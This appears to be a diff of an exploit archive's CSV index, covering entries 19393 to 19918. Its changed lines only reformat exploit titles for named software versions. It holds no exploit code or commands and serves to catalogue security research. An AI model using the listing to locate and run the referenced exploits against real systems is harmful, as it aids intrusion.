Able2Extract Server 6.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 +19393,platforms/windows/dos/19393.py,"Able2Doc and Able2Doc Professional 6.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 19394,platforms/asp/webapps/19394.txt,"Parodia 6.8 employer-profile.asp SQL Injection",2012-06-25,"Carlos Mario Penagos Hollmann",asp,webapps,0 19398,platforms/php/webapps/19398.txt,"Wordpress Fancy Gallery Plugin 1.2.4 Arbitrary File Upload",2012-06-25,"Sammy FORGIT",php,webapps,0 19400,platforms/php/webapps/19400.txt,"WordPress Website FAQ Plugin 1.0 - SQL Injection",2012-06-26,"Chris Kellum",php,webapps,0 19401,platforms/windows/local/19401.txt,"quicktime.util.QTByteObject Initialization Security Checks Bypass",2012-06-26,"Security Explorations",windows,local,0 19402,platforms/hardware/remote/19402.txt,"Root Exploit Western Digital's WD TV Live SMP/Hub",2012-06-26,"Wolfgang Borst",hardware,remote,0 19403,platforms/php/webapps/19403.rb,"SugarCRM <= 6.3.1 unserialize() PHP Code Execution",2012-06-26,metasploit,php,webapps,0 -19406,platforms/linux/webapps/19406.txt,"Symantec Web Gateway 5.0.2.8 Multiple Vulnerabilities",2012-06-27,"S2 Crew",linux,webapps,0 +19406,platforms/linux/webapps/19406.txt,"symantec web gateway 5.0.2.8 - Multiple Vulnerabilities",2012-06-27,"S2 Crew",linux,webapps,0 19407,platforms/windows/remote/19407.py,"Symantec PcAnywhere 12.5.0 Login and Password Field Buffer Overflow",2012-06-27,"S2 Crew",windows,remote,0 19408,platforms/php/webapps/19408.txt,"Zend Framework Local File Disclosure",2012-06-27,"SEC Consult",php,webapps,0 -19409,platforms/windows/dos/19409.txt,"Sielco Sistemi Winlog 2.07.16 Multiple Vulnerabilities",2012-06-27,"Luigi Auriemma",windows,dos,0 +19409,platforms/windows/dos/19409.txt,"sielco sistemi winlog 2.07.16 - Multiple Vulnerabilities",2012-06-27,"Luigi Auriemma",windows,dos,0 19410,platforms/windows/dos/19410.py,"Qbik WinGate 3.0/Pro 4.0.1/Standard 4.0.1 Buffer Overflow DoS Vulnerability",1999-02-22,Prizm,windows,dos,0 19411,platforms/bsd/local/19411,"BSDI BSD/OS 4.0,FreeBSD 3.2,NetBSD 1.4 x86,OpenBSD 2.5 UFS Secure Level 1 Vulnerability",1999-07-02,Stealth,bsd,local,0 19412,platforms/windows/local/19412.c,"Qbik WinGate 3.0 Registry Vulnerability",1999-02-22,Chris,windows,local,0 @@ -16800,18 +16798,18 @@ id,file,description,date,author,platform,type,port 19449,platforms/windows/remote/19449.c,"Fujitsu Chocoa 1.0 beta7R ""Topic"" Buffer Overflow Vulnerability",1999-08-03,UNYUN,windows,remote,0 19450,platforms/windows/remote/19450.c,"CREAR ALMail32 1.10 Buffer Overflow Vulnerability",1999-08-08,UNYUN,windows,remote,0 19451,platforms/multiple/remote/19451,"Microsoft Windows 98 a/98 b/98SE,Solaris 2.6 IRDP Vulnerability",1999-08-11,L0pth,multiple,remote,0 -19452,platforms/php/webapps/19452.txt,"phpmoneybooks 1.03 Stored XSS",2012-06-29,chap0,php,webapps,0 +19452,platforms/php/webapps/19452.txt,"phpmoneybooks 1.03 - Stored XSS",2012-06-29,chap0,php,webapps,0 19453,platforms/windows/dos/19453.cpp,"PC Tools Firewall Plus 7.0.0.123 Local DoS",2012-06-29,0in,windows,dos,0 -19455,platforms/windows/webapps/19455.txt,"SpecView <= 2.5 build 853 Directory Traversal",2012-06-29,"Luigi Auriemma",windows,webapps,0 +19455,platforms/windows/webapps/19455.txt,"specview <= 2.5 build 853 - Directory Traversal",2012-06-29,"Luigi Auriemma",windows,webapps,0 19456,platforms/windows/dos/19456.txt,"PowerNet Twin Client <= 8.9 (RFSync 1.0.0.1) Crash PoC",2012-06-29,"Luigi Auriemma",windows,dos,0 19457,platforms/multiple/dos/19457,"Ms Commercial Internet System 2.0/2.5,IIS 4.0,Site Server Commerce Edition 3.0 alpha/3.0 DoS",1999-08-11,"Nobuo Miwa",multiple,dos,0 -19458,platforms/linux/remote/19458.c,"Linux kernel 2.0.30/2.0.35/2.0.36/2.0.37 Blind TCP Spoofing Vulnerability",1999-07-31,Nergal,linux,remote,0 +19458,platforms/linux/remote/19458.c,"Linux kernel 2.0.30/2.0.35/2.0.36/2.0.37 - Blind TCP Spoofing Vulnerability",1999-07-31,Nergal,linux,remote,0 19459,platforms/multiple/remote/19459,"Hybrid Ircd 5.0.3 p7 Buffer Overflow Vulnerability",1999-08-13,"jduck and stranjer",multiple,remote,0 19460,platforms/multiple/local/19460.sh,"Oracle <= 8 8.1.5 Intelligent Agent Vulnerability (1)",1999-08-16,"Brock Tellier",multiple,local,0 19461,platforms/multiple/local/19461.c,"Oracle <= 8 8.1.5 Intelligent Agent Vulnerability (2)",1999-08-16,"Gilles PARC",multiple,local,0 19462,platforms/windows/local/19462.c,"Microsoft Windows 95/98 IE5/Telnet Heap Overflow Vulnerability",1999-08-16,"Jeremy Kothe",windows,local,0 19463,platforms/linux/remote/19463.c,"S.u.S.E. Linux <= 6.2,Slackware Linux 3.2/3.6 identd Denial of Service",1999-08-16,friedolin,linux,remote,0 -19464,platforms/linux/local/19464.c,"RedHat Linux <= 6.0, Slackware Linux <= 4.0 Termcap tgetent() Buffer Overflow (1)",1999-08-18,m0f0,linux,local,0 +19464,platforms/linux/local/19464.c,"RedHat Linux <= 6.0, Slackware Linux <= 4.0 Termcap tgetent() Buffer Overflow (1)",1999-08-18,m0f0,linux,local,0 19465,platforms/linux/local/19465.c,"RedHat Linux <= 6.0, Slackware Linux <= 4.0 Termcap tgetent() Buffer Overflow (2)",1999-08-18,sk8,linux,local,0 19466,platforms/multiple/remote/19466,"Hughes Technologies Mini SQL (mSQL) 2.0/2.0.10 Vulnerability",1999-08-18,"Gregory Duchemin",multiple,remote,0 19467,platforms/linux/local/19467.c,"GNU glibc 2.1/2.1.1 -6 pt_chown Vulnerability",1999-08-23,"Michal Zalewski",linux,local,0 @@ -16882,10 +16880,10 @@ id,file,description,date,author,platform,type,port 19534,platforms/solaris/local/19534.c,"Solaris <= 7.0 ufsdump Local Buffer Overflow Vulnerability (2)",1998-12-30,"Cheez Whiz",solaris,local,0 19535,platforms/hp-ux/local/19535.pl,"HP-UX <= 10.20 newgrp Vulnerability",1996-12-01,SOD,hp-ux,local,0 19536,platforms/multiple/dos/19536.txt,"Apache <= 1.1,NCSA httpd <= 1.5.2,Netscape Server 1.12/1.1/2.0 a nph-test-cgi Vulnerability",1996-12-10,"Josh Richards",multiple,dos,0 -19537,platforms/windows/remote/19537.txt,"TeamShare TeamTrack 3.0 Directory Traversal Vulnerability",1999-10-02,"rain forest puppy",windows,remote,0 +19537,platforms/windows/remote/19537.txt,"teamshare teamtrack 3.0 - Directory Traversal vulnerability",1999-10-02,"rain forest puppy",windows,remote,0 19538,platforms/hardware/remote/19538.txt,"Hybrid Networks Cable Broadband Access System 1.0 Remote Configuration Vulnerability",1999-10-05,KSR[T],hardware,remote,0 19539,platforms/windows/remote/19539.txt,"MS IE 5.0/4.0.1 IFRAME Vulnerability",1999-10-11,"Georgi Guninski",windows,remote,0 -19540,platforms/windows/remote/19540.txt,"T. Hauck Jana Webserver 1.0/1.45/1.46 Directory Traversal Vulnerability",1999-10-08,"Jason Lutz",windows,remote,0 +19540,platforms/windows/remote/19540.txt,"t. hauck jana webserver 1.0/1.45/1.46 - Directory Traversal vulnerability",1999-10-08,"Jason Lutz",windows,remote,0 19541,platforms/novell/remote/19541.txt,"Novell Client 3.0/3.0.1 Denial of Service Vulnerability",1999-10-08,"Bruce Dennison",novell,remote,0 19542,platforms/sco/local/19542.txt,"SCO Open Server <= 5.0.5 'userOsa' symlink Vulnerability",1999-10-11,"Brock Tellier",sco,local,0 19543,platforms/sco/local/19543.c,"SCO Open Server 5.0.5 cancel Buffer Overflow Vulnerability",1999-10-08,"Brock Tellier",sco,local,0 @@ -16913,11 +16911,11 @@ id,file,description,date,author,platform,type,port 19565,platforms/linux/local/19565.sh,"S.u.S.E. Linux 6.1/6.2 cwdtools Vulnerabilities",1999-10-22,"Brock Tellier",linux,local,0 19566,platforms/windows/remote/19566.c,"Omnicron OmniHTTPD 1.1/2.4 Pro Buffer Overflow Vulnerability",1999-10-22,UNYUN,windows,remote,0 19567,platforms/linux/remote/19567.txt,"National Science Foundation Squid Web Proxy 1.0/1.1/2.1 Authentication Failure",1999-10-25,"Oezguer Kesim",linux,remote,0 -19568,platforms/windows/remote/19568.txt,"Pacific Software URL Live! 1.0 Directory Traversal Vulnerability",1999-10-28,UNYUN,windows,remote,0 +19568,platforms/windows/remote/19568.txt,"pacific software url live! 1.0 - Directory Traversal vulnerability",1999-10-28,UNYUN,windows,remote,0 19569,platforms/windows/dos/19569.pl,"WFTPD 2.34/2.40/3.0 Remote Buffer Overflow Vulnerability (1)",1999-10-28,"Alberto Soli",windows,dos,0 19570,platforms/windows/remote/19570.txt,"WFTPD 2.34/2.40/3.0 Remote Buffer Overflow Vulnerability (2)",1999-11-04,"Alberto Solino",windows,remote,0 19571,platforms/multiple/dos/19571.c,"Netscape Messaging Server 3.6/3.54/3.55 RCPT TO DoS Vulnerability",1999-10-28,"Nobuo Miwa",multiple,dos,0 -19572,platforms/php/webapps/19572.txt,"WordPress MoodThingy Widget v0.8.7 Blind SQL Injection",2012-07-04,"Chris Kellum",php,webapps,0 +19572,platforms/php/webapps/19572.txt,"WordPress MoodThingy Widget 0.8.7 - Blind SQL Injection",2012-07-04,"Chris Kellum",php,webapps,0 19573,platforms/php/webapps/19573.php,"Tiki Wiki CMS Groupware <= 8.3 ""unserialize()"" PHP Code Execution",2012-07-04,EgiX,php,webapps,0 19574,platforms/php/webapps/19574.txt,"Webify Link Directory SQL Injection",2012-07-04,"Daniel Godoy",php,webapps,0 19575,platforms/windows/dos/19575.txt,".Net Framework Tilde Character DoS",2012-07-04,"Soroush Dalili",windows,dos,0 @@ -16944,7 +16942,7 @@ id,file,description,date,author,platform,type,port 19597,platforms/php/webapps/19597.txt,"GuestBook Scripts PHP 1.5 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,php,webapps,0 19598,platforms/php/webapps/19598.txt,"Freeside SelfService CGI/API 2.3.3 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,php,webapps,0 19600,platforms/php/webapps/19600.txt,"CLscript CMS 3.0 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,php,webapps,0 -19601,platforms/windows/remote/19601.txt,"Etype Eserv 2.50 Directory Traversal Vulnerability",1999-11-04,"Ussr Labs",windows,remote,0 +19601,platforms/windows/remote/19601.txt,"etype eserv 2.50 - Directory Traversal vulnerability",1999-11-04,"Ussr Labs",windows,remote,0 19602,platforms/linux/local/19602.c,"Eric Allman Sendmail 8.8 .x Socket Hijack Vulnerability",1999-11-05,"Michal Zalewski",linux,local,0 19603,platforms/windows/remote/19603.txt,"MS IE 4.x/5.0,Outlook 2000 0/98 0/Express 4.x ActiveX CAB File Execution",1999-11-08,Mukund,windows,remote,0 19605,platforms/linux/dos/19605.c,"Linux Kernel fs/eventpoll.c Local Denial of Service",2012-07-05,"Yurij M. Plotnikov",linux,dos,0 @@ -16967,9 +16965,9 @@ id,file,description,date,author,platform,type,port 19623,platforms/windows/remote/19623.c,"International TeleCommunications WebBBS 2.13 login & password Buffer Overflow",1999-11-15,UNYUN,windows,remote,0 19624,platforms/windows/dos/19624.txt,"Gene6 G6 FTP Server 2.0 Buffer Overflow DoS Vulnerability",1999-11-17,"Ussr Labs",windows,dos,0 19625,platforms/windows/remote/19625.py,"ALLMediaServer 0.8 SEH Overflow Exploit",2012-07-06,"motaz reda",windows,remote,888 -19626,platforms/php/webapps/19626.txt,"sflog! <= 1.00 Multiple Vulnerabilities",2012-07-06,dun,php,webapps,0 +19626,platforms/php/webapps/19626.txt,"sflog! <= 1.00 - Multiple Vulnerabilities",2012-07-06,dun,php,webapps,0 19628,platforms/php/webapps/19628.txt,"Event Script PHP 1.1 CMS - Multiple Vulnerabilities",2012-07-06,Vulnerability-Lab,php,webapps,0 -19629,platforms/php/webapps/19629.txt,"Webmatic 3.1.1 Blind SQL Injection",2012-07-06,"High-Tech Bridge SA",php,webapps,0 +19629,platforms/php/webapps/19629.txt,"Webmatic 3.1.1 - Blind SQL Injection",2012-07-06,"High-Tech Bridge SA",php,webapps,0 19630,platforms/php/webapps/19630.rb,"Tiki Wiki <= 8.3 unserialize() PHP Code Execution",2012-07-09,metasploit,php,webapps,0 19631,platforms/php/webapps/19631.rb,"Basilic 1.5.14 diff.php Arbitrary Command Execution",2012-07-09,metasploit,php,webapps,0 19632,platforms/hardware/remote/19632.txt,"Tektronix Phaser Network Printer 740/750/750DP/840/930 PhaserLink Webserver Vulnerability",1999-11-17,"Dennis W. Mattison",hardware,remote,0 @@ -16984,7 +16982,7 @@ id,file,description,date,author,platform,type,port 19641,platforms/sco/local/19641.c,"SCO Unixware 7.0/7.0.1/7.1 Xsco Buffer Overflow Vulnerability",1999-11-25,k2,sco,local,0 19642,platforms/sco/local/19642.c,"SCO Unixware 7.0 xlock(1) (long username) Buffer Overflow Vulnerability",1999-11-25,AK,sco,local,0 19643,platforms/sco/local/19643.c,"SCO Unixware 2.1/7.0/7.0.1/7.1/7.1.1 su(1) Buffer Overflow Vulnerability",1999-10-30,k2,sco,local,0 -19644,platforms/multiple/remote/19644.txt,"Symantec Mail-Gear 1.0 Directory Traversal Vulnerability",1999-11-29,"Ussr Labs",multiple,remote,0 +19644,platforms/multiple/remote/19644.txt,"symantec mail-gear 1.0 - Directory Traversal vulnerability",1999-11-29,"Ussr Labs",multiple,remote,0 19645,platforms/unix/remote/19645.c,"Qualcomm qpopper 3.0/3.0 b20 Remote Buffer Overflow Vulnerability (1)",1999-11-30,Mixter,unix,remote,0 19646,platforms/unix/remote/19646.pl,"Qualcomm qpopper 3.0/3.0 b20 Remote Buffer Overflow Vulnerability (2)",1999-11-30,"Synnergy Networks",unix,remote,0 19647,platforms/solaris/local/19647.c,"Solaris 7.0 kcms_configure",1999-11-30,UNYUN,solaris,local,0 @@ -17047,7 +17045,7 @@ id,file,description,date,author,platform,type,port 19704,platforms/multiple/local/19704.sh,"Nortel Networks Optivity NETarchitect 2.0 PATH Vulnerability",1999-12-30,Loneguard,multiple,local,0 19705,platforms/unixware/remote/19705.c,"Netscape FastTrack Server 2.0.1 a GET Buffer Overflow Vulnerability",1999-12-31,"Brock Tellier",unixware,remote,0 19706,platforms/irix/local/19706.sh,"SGI IRIX 6.2 midikeys/soundplayer Vulnerability",1999-12-31,Loneguard,irix,local,0 -19707,platforms/unix/local/19707.sh,"Ascend CascadeView/UX 1.0 tftpd Symbolic Link Vulnerability",1999-12-31,Loneguard,unix,local,0 +19707,platforms/unix/local/19707.sh,"Ascend CascadeView/UX 1.0 tftpd - Symbolic Link Vulnerability",1999-12-31,Loneguard,unix,local,0 19708,platforms/php/remote/19708.php,"PHP <= 3.0.13 'safe_mode' Failure Vulnerability",2000-01-04,"Kristian Koehntopp",php,remote,0 19709,platforms/linux/local/19709.sh,"Mandrake 6.x,RedHat 6.x,Turbolinux 3.5 b2/4.x/6.0.2 userhelper/PAM Path Vulnerability (1)",2000-01-04,dildog,linux,local,0 19710,platforms/linux/local/19710.c,"Mandrake 6.x,RedHat 6.x,Turbolinux 3.5 b2/4.x/6.0.2 userhelper/PAM Path Vulnerability (2)",2000-03-15,"Elias Levy",linux,local,0 @@ -17071,7 +17069,7 @@ id,file,description,date,author,platform,type,port 19728,platforms/windows/local/19728.txt,"Microsoft Systems Management Server 2.0 Default Permissions Vulnerability",1999-12-29,"Frank Monroe",windows,local,0 19729,platforms/linux/remote/19729.c,"Qualcomm qpopper 3.0 'LIST' Buffer Overflow Vulnerability",2000-01-10,Zhodiac,linux,remote,0 19730,platforms/windows/remote/19730.c,"A-V Tronics InetServ 3.0 WebMail Long GET Request Vulnerability",2000-01-17,"Greg Hoglund",windows,remote,0 -19731,platforms/windows/remote/19731.c,"Microsoft Index Server 2.0/Indexing Services for Windows 2000 Directory Traversal",2000-01-26,fredrik.widlund,windows,remote,0 +19731,platforms/windows/remote/19731.c,"microsoft index server 2.0/indexing services for windows 2000 - Directory Traversal",2000-01-26,fredrik.widlund,windows,remote,0 19732,platforms/multiple/remote/19732.html,"Check Point Software Firewall-1 3.0 Script Tag Checking Bypass Vulnerability",2000-01-29,"Arne Vidstrom",multiple,remote,0 19733,platforms/windows/local/19733.txt,"McAfee 4.0,Network Associates for Windows NT 4.0.2/4.0.3 a,Norton AntiVirus 2000 Recycle Bin Exclusion",1999-12-22,"Neil Bortnak",windows,local,0 19734,platforms/windows/remote/19734.java,"Microsoft Virtual Machine 2000 Series/3000 Series getSystemResource Vulnerability",2000-01-31,"Hiromitsu Takagi",windows,remote,0 @@ -17081,7 +17079,7 @@ id,file,description,date,author,platform,type,port 19739,platforms/windows/local/19739.txt,"Microsoft Windows NT 4.0 Recycle Bin Pre-created Folder Vulnerability",2000-02-01,"Arne Vidstron and Nobuo Miwa",windows,local,0 19740,platforms/windows/dos/19740.c,"Jgaa WarFTPd 1.66 x4s/1.67 -3 CWD/MKD DoS Vulnerability",2000-02-03,crc,windows,dos,0 19741,platforms/cgi/remote/19741.pl,"Wired Community Software WWWThreads 5.0 SQL Command Input Vulnerability",2000-02-03,"rain forest puppy",cgi,remote,0 -19742,platforms/multiple/remote/19742.txt,"Microsoft IIS 3.0/4.0,Microsoft Index Server 2.0 Directory Traversal",2000-02-02,Mnemonix,multiple,remote,0 +19742,platforms/multiple/remote/19742.txt,"microsoft iis 3.0/4.0,microsoft index server 2.0 - Directory Traversal",2000-02-02,Mnemonix,multiple,remote,0 19743,platforms/windows/remote/19743.txt,"Cat Soft Serv-U 2.5/a/b,Windows 2000/95/98/NT 4.0 Shortcut Vulnerability",2000-02-04,"Ussr Labs",windows,remote,0 19744,platforms/novell/dos/19744.txt,"Novell Groupwise Enhancement Pack 5.5 Enhancement Pack DoS",2000-02-07,"Adam Gray",novell,dos,0 19745,platforms/cgi/remote/19745.txt,"Daniel Beckham The Finger Server 0.82 BETA Pipe Vulnerability",2000-02-04,"Iain Wade",cgi,remote,0 @@ -17092,7 +17090,7 @@ id,file,description,date,author,platform,type,port 19750,platforms/multiple/dos/19750.sh,"Netopia Timbuktu Pro Remote Control 2.0/5.2.1 DoS Vulnerability",2000-02-11,eth0,multiple,dos,0 19751,platforms/multiple/remote/19751.txt,"Ascom COLTSOHO,Brocade Fabric OS,MatchBox,Win98/NT4,Solaris,Xyplex SNMP World Writeable Community",2000-02-15,"Michal Zalewski",multiple,remote,0 19752,platforms/sco/local/19752.txt,"SCO Unixware 7.1/7.1.1 ARCserver /tmp symlink Vulnerability",2000-02-15,"Shawn Bracken",sco,local,0 -19753,platforms/windows/remote/19753.txt,"MS FrontPage Personal WebServer 1.0/Personal Web Server 4.0 Directory Traversal",1996-01-17,kiborg,windows,remote,0 +19753,platforms/windows/remote/19753.txt,"ms frontpage personal webserver 1.0/personal web server 4.0 - Directory Traversal",1996-01-17,kiborg,windows,remote,0 19754,platforms/windows/local/19754.txt,"Microsoft Windows 95/98/NT 4.0 autorun.inf Vulnerability",2000-02-18,"Eric Stevens",windows,local,0 19755,platforms/windows/dos/19755.txt,"Pragma Systems InterAccess TelnetD Server 4.0 Build 4 Buffer Overflow",2000-02-21,"Ussr Labs",windows,dos,0 19756,platforms/freebsd/local/19756.txt,"FreeBSD 3.0/3.1/3.2/3.3/3.4 Asmon/Ascpu Vulnerability",2000-02-19,Anonymous,freebsd,local,0 @@ -17106,9 +17104,9 @@ id,file,description,date,author,platform,type,port 19764,platforms/linux/local/19764.txt,"Corel Linux OS 1.0 buildxconfig Vulnerabilities",2000-02-24,suid,linux,local,0 19765,platforms/linux/local/19765.txt,"Corel Linux OS 1.0 setxconf Vulnerability",2000-02-24,suid,linux,local,0 19766,platforms/hardware/dos/19766.txt,"Nortel Networks Nautica Marlin Denial of Service Vulnerablility",2000-02-25,"Christophe GRENIER",hardware,dos,0 -19768,platforms/php/webapps/19768.txt,"House Style 0.1.2 => readfile() Local File Disclosure Vulnerability",2012-07-12,GoLd_M,php,webapps,0 -19769,platforms/php/webapps/19769.txt,"eCan v0.1 => Local File Disclosure Vulnerability",2012-07-12,GoLd_M,php,webapps,0 -19771,platforms/php/webapps/19771.txt,"Lc Flickr Carousel 1.0 => - Local File Disclosure Vulnerability",2012-07-12,GoLd_M,php,webapps,0 +19768,platforms/php/webapps/19768.txt,"House Style 0.1.2 - readfile() Local File Disclosure Vulnerability",2012-07-12,GoLd_M,php,webapps,0 +19769,platforms/php/webapps/19769.txt,"eCan 0.1 - Local File Disclosure Vulnerability",2012-07-12,GoLd_M,php,webapps,0 +19771,platforms/php/webapps/19771.txt,"Lc Flickr Carousel 1.0 - Local File Disclosure Vulnerability",2012-07-12,GoLd_M,php,webapps,0 19772,platforms/windows/dos/19772.txt,"WaveSurfer 1.8.8p4 - Memory Corruption PoC",2012-07-12,"Jean Pascal Pereira",windows,dos,0 19774,platforms/hardware/webapps/19774.txt,"TP Link Gateway 3.12.4 - Multiple Vulnerabilities",2012-07-12,Vulnerability-Lab,hardware,webapps,0 19775,platforms/php/webapps/19775.txt,"Reserve Logic 1.2 - Booking CMS Multiple Vulnerabilities",2012-07-12,Vulnerability-Lab,php,webapps,0 @@ -17126,7 +17124,7 @@ id,file,description,date,author,platform,type,port 19787,platforms/linux/local/19787.txt,"Corel Linux OS 1.0 Dosemu Distribution Configuration Vulnerability",2000-03-02,suid,linux,local,0 19788,platforms/irix/remote/19788.pl,"SGI InfoSearch 1.0,SGI IRIX 6.5.x fname Vulnerability",2000-03-05,rpc,irix,remote,0 19789,platforms/windows/local/19789.txt,"Microsoft Clip Art Gallery 5.0 Buffer Overflow Vulnerability",2000-03-06,dildog,windows,local,0 -19790,platforms/php/webapps/19790.txt,"WebPagetest <= 2.6 Multiple Vulnerabilities",2012-07-13,dun,php,webapps,0 +19790,platforms/php/webapps/19790.txt,"webpagetest <= 2.6 - Multiple Vulnerabilities",2012-07-13,dun,php,webapps,0 19791,platforms/php/webapps/19791.txt,"WordPress Resume Submissions & Job Postings 2.5.1 - Unrestricted File Upload",2012-07-13,"Chris Kellum",php,webapps,0 19792,platforms/php/webapps/19792.txt,"Joomla KISS Advertiser Remote File & Bypass Upload Vulnerability",2012-07-13,D4NB4R,php,webapps,0 19793,platforms/php/webapps/19793.txt,"Magento eCommerce Local File Disclosure",2012-07-13,"SEC Consult",php,webapps,0 @@ -17151,7 +17149,7 @@ id,file,description,date,author,platform,type,port 19812,platforms/linux/local/19812.c,"Halloween Linux 4.0,RedHat Linux 6.1/6.2 imwheel Vulnerability (2)",2000-03-13,"S. Krahmer & Stealth",linux,local,0 19813,platforms/linux/local/19813.txt,"Halloween Linux 4.0,S.u.S.E. Linux 6.0/6.1/6.2/6.3 kreatecd Vulnerability",2000-03-16,Sebastian,linux,local,0 19814,platforms/multiple/remote/19814.c,"Netscape Enterprise Server 3.0/3.6/3.51 Directory Indexing Vulnerability",2000-03-17,"Gabriel Maggiotti",multiple,remote,0 -19815,platforms/windows/remote/19815.txt,"vqSoft vqServer for Windows 1.9.9 Directory Traversal Vulnerability",2000-03-21,"Johan Nilsson",windows,remote,0 +19815,platforms/windows/remote/19815.txt,"vqsoft vqserver for windows 1.9.9 - Directory Traversal vulnerability",2000-03-21,"Johan Nilsson",windows,remote,0 19816,platforms/linux/local/19816.txt,"gpm 1.18.1/1.19,Debian 2.x,RedHat 6.x,S.u.S.E 5.3/6.x gpm Setgid Vulnerability",2000-03-22,"Egmont Koblinger",linux,local,0 19817,platforms/ultrix/dos/19817.txt,"Data General DG/UX 5.4 inetd Service Exhaustion Denial of Service",2000-03-16,"The Unicorn",ultrix,dos,0 19818,platforms/linux/local/19818.c,"Linux kernel 2.2.12/2.2.14/2.3.99,RedHat 6.x Socket Denial of Service",2000-03-23,"Jay Fenlason",linux,local,0 @@ -17187,16 +17185,16 @@ id,file,description,date,author,platform,type,port 19849,platforms/unix/remote/19849.pm,"UoW imapd 10.234/12.264 COPY Buffer Overflow (meta)",2000-04-16,vlad902,unix,remote,0 19850,platforms/linux/local/19850.c,"RedHat Linux 6.x X Font Server DoS and Buffer Overflow Vulnerabilities",2000-04-16,"Michal Zalewski",linux,local,0 19851,platforms/qnx/local/19851.c,"QSSL QNX 4.25 A crypt() Vulnerability",2000-04-15,Sean,qnx,local,0 -19852,platforms/cgi/remote/19852.txt,"Dansie Shopping Cart 3.0.4 Multiple Vulnerabilities",2000-04-14,"tombow & Randy Janinda",cgi,remote,0 +19852,platforms/cgi/remote/19852.txt,"dansie shopping cart 3.0.4 - Multiple Vulnerabilities",2000-04-14,"tombow & Randy Janinda",cgi,remote,0 19853,platforms/windows/dos/19853.txt,"FrontPage 97/98 Server Image Mapper Buffer Overflow",2000-04-19,Narrow,windows,dos,0 19854,platforms/netware/dos/19854.sh,"Novell Netware 5.1 Remote Administration Buffer Overflow Vulnerability",2000-04-19,"Michal Zalewski",netware,dos,0 -19855,platforms/windows/local/19855.txt,"Panda Security 3.0 Multiple Vulnerabilities",2000-04-17,Zan,windows,local,0 +19855,platforms/windows/local/19855.txt,"Panda Security 3.0 - Multiple Vulnerabilities",2000-04-17,Zan,windows,local,0 19856,platforms/windows/dos/19856.txt,"GameHouse dldisplay ActiveX control 0,Real Server 7.0 Port 7070 DoS",2000-04-20,"Ussr Labs",windows,dos,7070 19857,platforms/windows/remote/19857.rb,"ALLMediaServer 0.8 Buffer Overflow",2012-07-16,metasploit,windows,remote,888 19859,platforms/hardware/webapps/19859.txt,"Vivotek Cameras Sensitive Information Disclosure",2012-07-16,GothicX,hardware,webapps,0 19862,platforms/php/webapps/19862.pl,"Wordpress Diary/Notebook Site5 Theme Email Spoofing",2012-07-16,bwall,php,webapps,0 19863,platforms/php/webapps/19863.txt,"CakePHP 2.x-2.2.0-RC2 XXE Injection",2012-07-16,"Pawel h0wl Wylecial",php,webapps,0 -19864,platforms/php/webapps/19864.txt,"VamCart v0.9 CMS - Multiple Vulnerabilities",2012-07-16,Vulnerability-Lab,php,webapps,0 +19864,platforms/php/webapps/19864.txt,"VamCart 0.9 CMS - Multiple Vulnerabilities",2012-07-16,Vulnerability-Lab,php,webapps,0 19865,platforms/php/webapps/19865.txt,"PBBoard 2.1.4 - CMS Multiple Vulnerabilities",2012-07-16,Vulnerability-Lab,php,webapps,0 19866,platforms/windows/dos/19866.pl,"DomsHttpd <= 1.0 Remote Denial Of Service Exploit",2012-07-16,"Jean Pascal Pereira",windows,dos,0 19867,platforms/linux/local/19867.txt,"S.u.S.E. Linux 6.x Arbitrary File Deletion Vulnerability",2000-04-21,Peter_M,linux,local,0 @@ -17222,7 +17220,7 @@ id,file,description,date,author,platform,type,port 19887,platforms/multiple/remote/19887.c,"Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 beta Mail Logging Buffer Overflow (2)",2000-05-02,MaXX,multiple,remote,0 19888,platforms/multiple/remote/19888.c,"Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 beta Mail Logging Buffer Overflow (3)",2002-01-18,g463,multiple,remote,0 19889,platforms/windows/remote/19889.c,"Microsoft Windows 95/98 NetBIOS NULL Name Vulnerability",2000-05-02,"rain forest puppy",windows,remote,0 -19890,platforms/cgi/remote/19890.txt,"UltraScripts UltraBoard 1.6 Directory Traversal Vulnerability",2000-05-03,"Rudi Carell",cgi,remote,0 +19890,platforms/cgi/remote/19890.txt,"ultrascripts ultraboard 1.6 - Directory Traversal vulnerability",2000-05-03,"Rudi Carell",cgi,remote,0 19891,platforms/linux/remote/19891.c,"Ethereal 0.8.4/0.8.5/0.8.6,tcpdump 3.4/3.5 alpha DNS Decode Vulnerability (1)",1999-05-31,"Hugo Breton",linux,remote,0 19892,platforms/linux/remote/19892.txt,"Ethereal 0.8.4/0.8.5/0.8.6,tcpdump 3.4/3.5 alpha DNS Decode Vulnerability (2)",1999-05-31,scut,linux,remote,0 19893,platforms/windows/remote/19893.c,"L-Soft Listserv 1.8 Web Archives Buffer Overflow Vulnerability",2000-05-01,"David Litchfield",windows,remote,0 @@ -17247,9 +17245,9 @@ id,file,description,date,author,platform,type,port 19913,platforms/cgi/remote/19913.txt,"George Burgyan CGI Counter 4.0.2/4.0.7 Input Validation Vulnerability",2000-05-15,"Howard M. Kash III",cgi,remote,0 19914,platforms/windows/remote/19914.txt,"Seattle Lab Software Emurl 2.0 Email Account Access Vulnerability",2000-05-15,"Pierre Benoit",windows,remote,0 19915,platforms/linux/local/19915.txt,"KDE 1.1/1.1.1/1.2/2.0 kscd SHELL Environmental Variable Vulnerability",2000-05-16,Sebastian,linux,local,0 -19916,platforms/multiple/remote/19916.c,"Stake AntiSniff 1.0.1/Researchers Version 1.0 DNS Overflow Vulnerability (1)",2000-05-16,"Hugo Breton",multiple,remote,0 -19917,platforms/multiple/remote/19917.c,"Stake AntiSniff 1.0.1/Researchers Version 1.0 DNS Overflow Vulnerability (2)",2000-05-16,L0pht,multiple,remote,0 -19918,platforms/multiple/remote/19918.c,"Stake AntiSniff 1.0.1/Researchers Version 1.0 DNS Overflow Vulnerability (3)",2000-05-16,L0pht,multiple,remote,0 +19916,platforms/multiple/remote/19916.c,"Stake AntiSniff 1.0.1/Researchers Version 1.0 - DNS Overflow Vulnerability (1)",2000-05-16,"Hugo Breton",multiple,remote,0 +19917,platforms/multiple/remote/19917.c,"Stake AntiSniff 1.0.1/Researchers Version 1.0 - DNS Overflow Vulnerability (2)",2000-05-16,L0pht,multiple,remote,0 +19918,platforms/multiple/remote/19918.c,"Stake AntiSniff 